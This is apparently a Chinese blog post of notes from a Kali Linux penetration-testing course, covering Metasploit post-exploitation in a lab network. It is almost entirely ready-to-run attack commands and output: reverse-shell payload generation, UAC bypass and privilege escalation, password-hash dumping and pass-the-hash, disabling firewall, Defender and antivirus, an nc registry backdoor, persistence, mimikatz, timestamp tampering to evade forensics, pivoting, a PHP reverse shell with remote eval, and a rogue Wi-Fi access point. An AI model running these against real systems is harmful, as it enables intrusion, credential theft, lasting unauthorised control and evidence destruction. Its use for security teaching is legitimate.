Kali Linux渗透测试 146 Mestasploit 后渗透测试阶段
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程
Kali Linux渗透测试(苑房弘)博客记录
1. 准备工作
已经获得目标系统控制权后扩大战果
- 提权
- 信息收集
- 渗透内网
- 永久后门
基于已有 session 扩大战果
- msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -f exe -o payload.exe
kali 监听
msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set LHOST 10.0.0.128 msf exploit(multi/handler) > exploit -jwindows 系统执行 payload.exe
kali 进入 metepreter
msf exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows WIN7-VM\John @ WIN7-VM 10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132) msf exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows WIN7-VM\John @ WIN7-VM 10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132) msf exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: WIN7-VM\John
2. 获取 system 账号权限
提权失败,一般是由于 UAC 限制
meterpreter > getuid Server username: WIN7-VM\John meterpreter > load priv [-] The 'priv' extension has already been loaded. meterpreter > getsystem [-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted: [-] Named Pipe Impersonation (In Memory/Admin) [-] Named Pipe Impersonation (Dropper/Admin) [-] Token Duplication (In Memory/Admin) meterpreter > background绕过 UAC 限制
use exploit/windows/local/ask
use exploit/windows/local/ask set payload windows/meterpreter/reverse_tcp use exploit/windows/local/ask set payload windows/meterpreter/reverse_tcp set LHOST 10.0.0.128 set FILENAME win_update.exe set SESSION 1 exploitmeterpreter > getsystem meterpreter > getuiduse exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac set SESSION 1 set payload windows/meterpreter/reverse_tcp set LHOST 10.0.0.128 show targets exploituse exploit/windows/local/bypassuac_injection
use exploit/windows/local/bypassuac_injection set SESSION 1 set payload windows/meterpreter/reverse_tcp set LHOST 10.0.0.128 exploit
利用漏洞直接提权为 system
use exploit/windows/local/ms13_053_schlamperei
use exploit/windows/local/ms13_053_schlamperei set SESSION 1use exploit/windows/local/ms13_081_track_popup_menu
use exploit/windows/local/ms13_081_track_popup_menu set SESSION 1 exploituse exploit/windows/local/ms13_097_ie_registry_symlink
use exploit/windows/local/ms13_097_ie_registry_symlink set SESSION 1 set URIPATH / set payload windows/meterpreter/reverse_tcp set LHOST 10.0.0.128 set SRVHOST 10.0.0.128 exploituse exploit/windows/local/ppr_flatten_rec
use exploit/windows/local/ppr_flatten_rec set SESSION 1 exploit
图形化 payload
set payload windows/vncinject/reverse_tcp
use exploit/windows/local/ppr_flatten_rec set payload windows/vncinject/reverse_tcp set SESSION 1 set LHOST 10.0.0.128 set ViewOnly false exploit
关闭 UAC 功能
获取 hashdump
meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::尝试利用
use exploit/windows/smb/psexec set RHOST 10.0.0.132 set SMBUser John set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 set payload windows/meterpreter/reverse_tcp set LHOST 10.0.0.128 exploit报错:Exploit failed [no-access]
需要提前关闭 UAC
sessions -i 2 shell cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f shutdown -r -t 0再次利用
use exploit/windows/smb/psexec set RHOST 10.0.0.132 set SMBUser John set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 set payload windows/meterpreter/reverse_tcp set LHOST 10.0.0.128 exploit
4. 基础操作
1. 关闭防火墙
需要管理员或system权限
netsh advfirewall set allprofiles state on netsh advfirewall set allprofiles state off
2. 关闭 windefend
查看服务名称
关闭防火墙
net stop windefend
3. bitlocker 加密
- manage-bde -off C:
- manage-bde -status C:
4. 关闭 DEP
- bcdedit.exe /set {current} nx AlwaysOff
5 杀死防病毒软件
- run killav
- run post/windows/manage/killav
6. 开启远程桌面服务
# 开启服务
run post/windows/manage/enable_rdp
# 关闭服务
run multi_console_command -rc root/.msf4/loot/20180418001805_default_10.0.0.132_host.windows.cle_842354.txt
# 开启服务
run getgui –e
run getgui -u yuanfh -p pass
run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20160824.1855.rc
7. 查看远程桌面
- screenshot
- use espia
- screengrab
5. 使用 tokens 攻击域控制器
-tokens
- 用户每次登录,账号绑定临时的tokens
- 访问资源时提交 tokens 进行身份验证,类似于 web cookies
- delegate tokens:交互登录会话
- impersonate tokens:非交互登录会话
- delegate tokens 账号注销后变为 Impersonate Token,权限依然有效
Incognito
- 独立功能的软件,被 msf 集成在 metepreter 中
- 无需密码或破解或获取密码 hash,窃取 tokens 将自己伪装成其他用户
- 尤其适用于域环境下提权渗透多操作系统
搭建域环境
- DC + XP
load incognito
- list_tokens -u
- impersonate_token lab\administrator
- 运行以上命令需要 getsystem
- 本地普通权限用户需要先本地权限
- use exploit/windows/local/ms10_015_kitrap0d
- execute -f cmd.exe -i -t # -t:使用当前假冒tokens执行程序
- shell
8. 注册表
注册表保存着 windows 几乎全部配置参数
- 如果修改不当,可直接造成系统崩溃
- 修改前完整备份注册表
- 某些注册表的修改是不可逆的
常见用途
- 修改、增加启动项
- 窃取存储于注册表中的机密信息
- 绕过文件型病毒查杀
用注册表添加 nc 后门服务(metepreter)
- meterpreter >
- upload /usr/share/windows-binaries/nc.exe C:\windows\system32
- reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
- reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d ‘C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe’
- reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc
打开防火墙端口(metepreter)
- meterpreter >
- execute -f cmd -i -H
- netsh firewall show opmode
- netsh firewall add portopening TCP 4444 “test” ENABLE ALL
- shutdown -r -f -t 0
- nc 10.0.0.132 444
其他注册表项
- https://support.accessdata.com/hc/en-us/articles/204448155-Registry-Quick-Find-Chart
9. 抓包
- 抓包(metepreter)
- load sniffer
- sniffer_interfaces
- sniffer_start 2
- sniffer_dump 2 1.cap / sniffer_dump 2 1.cap
- 在内存中缓冲区块循环存储抓包(50000包),不写硬盘
- 智能过滤 metepreter 流量,传输全称使用 SSL/TLS 加密
- 解码
- use auxiliary/sniffer/psnuffle
- set PCAPFILE /root/1.cap
10. 搜索文件
- search -f *.ini
- search -d c:\documents\ and\ settings\administrator\desktop\ -f *.docx
11. 破解弱口令
- John the Ripper 破解弱口令
– use post/windows/gather/hashdump # system 权限的 metepreter
- run # 结果保存在 /tmp 目录下
- use auxiliary/analyze/jtr_crack_fast
- run
12. 擦除痕迹
- 文件系统访问会留下痕迹。电子取证重点关注
- 渗透测试和攻击者往往希望销毁文件系统访问痕迹
最好的避免被电子取证发现的方法:不要碰文件系统
- metepreter 的先天优势所在(完全基于内存)
MAC 时间 (Modified / Accessed / Changed)
- ls -l –time=atime/mtime/ctime 1.txt
- stat 1.txt
- touch -d “2 days ago” 1.txt
- touch -t 1501010101 1.txt
MACE:MFT entry
- MFT:NTFS 文件系统的主文件分配表 Master File Table
- 通常 1024 字节或2个硬盘扇区,其中存放多项 entry 信息
- 包含文件大量信息(大小 名称 目录位置 磁盘位置 创建日期)
- 更多信息可研究文件系统取证分析技术
Timestomp (meterpreter)
- timestomp -v 1.txt
- timestomp -f c:\autoexec.bat 1.txt
-b -r # 擦除 MACE 时间信息,目前此参数功能失效 - -m / -a / -c / -e / -z
- timestomp -z “MM/DD/YYYY HH24:MI:SS” 2.txt
13. pivoting 跳板 / 枢纽/支点
- msfvenom 制作 payload
msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=kali_firewall LPORT=4444 -b “\x00\xff” -e x86/shikata_ga_nai -f exe -o payload.exe 获取 system 权限
利用已经控制的一台计算机作为入侵内网的跳板
- 在其他内网计算机看来访问全部来自于跳板
run autoroute -s 1.1.1.0/24 # 不能访问外网的被攻击目标内网网段
自动路由现实场景
- 利用 win7 攻击内网 XP(对比 xp 有无外网访问权的情况)
– 扫描内网:use auxiliary/scanner/portscan/tcp
- 利用 win7 攻击内网 XP(对比 xp 有无外网访问权的情况)
Pivoting 之端口转发 portfwd
- 利用已经被控计算机,在kali 与攻击目标之间实现端口转发
- portfwd add -L LIP -l LPORT -r RIP -p RPORT
- portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389
- portfwd list / delete / flush
use exploit/windows/smb/ms08_067_netapi
- set RHOST 127.0.0.1
- set LHOST 2.1.1.10
- use exploit/multi/handler
- set exitonsession false
14. POST 模块
- meterpreter >
- run post/windows/gather/arp_scanner RHOSTS=10.0.0.0/24
- run post/windows/gather/checkvm
- run post/windows/gather/credentials/credential_collector
- run post/windows/gather/enum_applications
- run post/windows/gather/enum_logged_on_users
- run post/windows/gather/enum_snmp
- run post/windows/manage/delete_user USERNAME=yuanfh
- run post/multi/recon/local_exploit_suggester
- run post/multi/gather/env
- run post/multi/gather/firefox_creds
- run post/multi/gather/ssh_creds
- run post/multi/gather/check_malware REMOTEFILE=c:\a.exe
- run hostsedit -e 1.1.1.1,www.baidu.com
- migrate -N explorer.exe
- run [tab] [tab]
run winenum
自动执行 metepreter 脚本
- set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com
- set InitialAutoRunScript checkvm
自动执行 post 模块
- set InitialAutoRunScript migrate -n explorer.exe
- set AutoRunScript post/windows/gather/dumplinks
15 .持久后门
- 利用漏洞取得的 metepreter 运行内存中,重启失效
- 重复 exploit 漏洞可能造成服务崩溃
持久后门保证漏洞修复后仍可远程控制
metepreter 后门
- run metsvc -A # 删除 -r
- use exploit/multi/handler
- set PAYLOAD windows/metsvc_bind_tcp
- set LPORT 31337
- set RHOST 1.1.1.1
持久后门
- run persistence -h
- run persistence -X -i 10 -p 4444 -r 10.0.0.128
- run persistence -U -i 20 -p 4444 -r 10.0.0.128
- run persistence -S -i 20 -p 4444 -r 10.0.0.128
16. msf 延伸用法之 mimikatz
- hashdump 使用的就是 mimikatz 的部分功能
- getsystem
- load mimikatz
- wdigest ��kerberos ��msv ��ssp ��tspkg ��livessp
- mimikatz_command -h
- mimikatz_command -f a::
- mimikatz_command -f samdump::hashes
- mimikatz_command -f handle::list
- mimikatz_command -f service::list
- mimikatz_command -f crypto::listProviders
- mimikatz_command -f winmine::infos # 扫雷游戏
17. 代码执行漏洞
PHP shell
- msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f raw -o a.php
- msf 启动侦听
- 上传到web站点并通过浏览器访问
web Delivery
- 利用代码执行漏洞访问攻击者服务器
- use exploit/multi/script/web_delivery
- set target 1
- run
- php -d allow_url_fopen=true -r “eval(file_get_contents(‘http://1.1.1.1/fTYWqmu‘));”
18. RFI 远程文件包含
- vi /etc/php5/cgi/php.ini
- allow_url_fopen = On
- allow_url_include = On
- use exploit/unix/webapp/php_include
- set RHOST 1.1.1.2
- set PATH /dvwa/vulnerabilities/fi/
- set PHPURI /?page=XXpathXX
- set HEADERS “Cookie:security=low;PHPSESSID=eefcf023ba61219d4745ad7487fe81d7”
- set payload php/meterpreter/reverse_tcp
- set lhost 1.1.1.1
- exploit
18. Karmetasploit
- 伪造 AP、嗅探密码、接货数据、浏览器攻击
多漏洞资源文件:wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt
安装其他依赖包
- gem install activerecord sqlite3-ruby
基础架构安装配置
- apt-get install isc-dhcp-server
- cat /etc/dhcp/dhcpd.conf
option domain-name-servers 10.0.0.1; default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
伪造 AP
- airmon-ng start wlan0
- airbase-ng -P -C 30 -e “FREE” -v wlan0mon
- ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
- touch /var/lib/dhcp/dhcpd.leases
- dhcpd -cf /etc/dhcp/dhcpd.conf at0
启动 Karmetasploit
- msfconsole -q -r karma.rc_.txt
允许用户正常上网
vi karma.rc_.txt
文件链接:https://pan.baidu.com/s/1ShLYDGaoIo9M-ihU0iN8Eg 密码:tpc0
删除 setg 参数
- 增加 browser_autopwn2 等其他模块
- 检查恶意流量:auxiliary/vsploit/malware/dns*
启动 Karmetasploit
- msfconsole -q -r karma.rc_.txt
增加路由和防火墙规则
- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables -P FORWARD ACCEPT
- iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE